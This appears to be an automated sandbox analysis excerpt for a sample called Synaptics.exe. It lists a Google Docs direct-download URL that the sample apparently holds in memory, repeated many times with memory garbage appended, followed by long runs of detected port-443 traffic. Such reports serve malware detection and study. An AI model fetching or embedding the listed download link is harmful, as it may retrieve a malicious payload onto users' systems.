                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle2
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadliR
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlit
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.vn
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm8
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmPL
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmY
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmargi
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmze
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.bK
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn7
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnE
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnX
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.cn
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnoO
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnx
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoSN
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogF
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo&
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadouble/
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
